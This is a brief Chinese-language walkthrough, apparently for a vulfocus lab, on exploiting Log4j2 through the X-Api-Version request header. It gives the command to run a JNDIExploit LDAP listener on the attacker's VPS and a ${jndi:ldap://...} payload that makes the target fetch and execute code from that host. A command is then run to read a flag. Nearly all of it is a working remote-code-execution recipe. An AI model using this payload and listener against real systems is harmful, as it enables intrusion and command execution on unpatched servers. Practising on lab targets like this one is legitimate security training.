vulfocus:log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段
1、首先准备一个vps环境(腾讯云阿里云都可)
在vps上开启ldap环境:(Log4j2-Exp工具在github上自行下载)
输入命令开启监听:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的vps的IP地址 -l 7000 -p 5000
2、bp抓包伺候
构造payload:payload=${jndi:ldap://你vps地址:7000/TomcatBypass/TomcatEcho}
获取flag获取cmd:ls /tmp
注意查看自己的监听端口:是有数据回显的